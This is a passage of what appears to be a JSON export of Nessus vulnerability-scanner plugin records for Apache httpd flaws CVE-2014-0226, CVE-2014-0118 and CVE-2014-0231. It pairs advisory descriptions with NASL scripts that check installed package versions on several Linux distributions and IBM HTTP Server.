reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.3-87.el5_10\")) flag++;\n\n\n 
if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-31.el6_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:29:38", "description": "Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. 
After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 25, "published": "2014-07-24T00:00:00", "title": "CentOS 5 / 6 : httpd (CESA-2014:0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:mod_ssl", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920 and \n# CentOS Errata and Security Advisory 2014:0920 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76715);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"CentOS 5 / 6 : httpd (CESA-2014:0920)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. 
After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd7ee438\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d737081a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0226\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-devel-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"httpd-manual-2.2.3-87.el5.centos\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"mod_ssl-2.2.3-87.el5.centos\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-31.el6.centos\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-31.el6.centos\")) flag++;\nif 
(rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-31.el6.centos\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:22:55", "description": "A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. 
(CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be\nrestarted automatically.", "edition": 14, "published": "2014-07-24T00:00:00", "title": "Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64 (20140723)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "p-cpe:/a:fermilab:scientific_linux:httpd", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:httpd-devel"], "id": "SL_20140723_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/76753", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76753);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x, SL6.x i386/x86_64 (20140723)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. 
A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAfter installing the updated packages, the httpd daemon will be\nrestarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1407&L=scientific-linux-errata&T=0&P=1884\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6a0123d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-87.sl5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-87.sl5\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-31.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-31.sl6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:10:02", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.", "edition": 22, "published": "2014-07-24T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 
14.1 / current : httpd (SSA:2014-204-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2014-204-01.NASL", "href": "https://www.tenable.com/plugins/nessus/76712", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-204-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76712);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/07/26 04:39:24 $\");\n\n script_cve_id(\"CVE-2014-0117\", \"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"SSA\", value:\"2014-204-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : httpd (SSA:2014-204-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.616658\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c5ef3e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.27\", 
pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.27\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.10\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-17T03:21:44", "description": "The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities, as follows:\n\n - Race condition in the 
mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to\ncause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential\ninformation or execute arbitrary code, via a crafted request that triggers improper scoreboard handling\nwithin the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker\nfunction in modules/lua/lua_request.c. (CVE-2014-0226)\n\n - The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which\nallows remote attackers to cause a denial of service (process hang) via a request to a CGI script that\ndoes not read from its stdin file descriptor. (CVE-2014-0231)\n\n - The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before\n2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service\n(resource consumption) via crafted request data that decompresses to a much larger size. (CVE-2014-0118)\n\n - The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass 'RequestHeader\nunset' directives by placing a header in the trailer portion of data sent with chunked transfer coding.\nNOTE: the vendor states 'this is not a security issue in httpd as such.' (CVE-2013-5704)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2020-12-15T00:00:00", "title": "IBM HTTP Server 8.5.0.0 <= 8.5.5.2 / 8.0.0.0 <= 8.0.0.9 / 7.0.0.0 <= 7.0.0.33 / 6.1.0.0. 
<= 6.1.0.47 / 6.0.2.0 <= 6.0.2.43 Multiple Vulnerabilities (509275)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2020-12-15T00:00:00", "cpe": ["cpe:/a:ibm:http_server"], "id": "IBM_HTTP_SERVER_509275.NASL", "href": "https://www.tenable.com/plugins/nessus/144289", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144289);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/16\");\n\n script_cve_id(\n \"CVE-2013-5704\",\n \"CVE-2014-0118\",\n \"CVE-2014-0226\",\n \"CVE-2014-0231\"\n );\n script_bugtraq_id(\n 66550,\n 68678,\n 68742,\n 68745\n );\n\n script_name(english:\"IBM HTTP Server 8.5.0.0 <= 8.5.5.2 / 8.0.0.0 <= 8.0.0.9 / 7.0.0.0 <= 7.0.0.33 / 6.1.0.0. <= 6.1.0.47 / 6.0.2.0 <= 6.0.2.43 Multiple 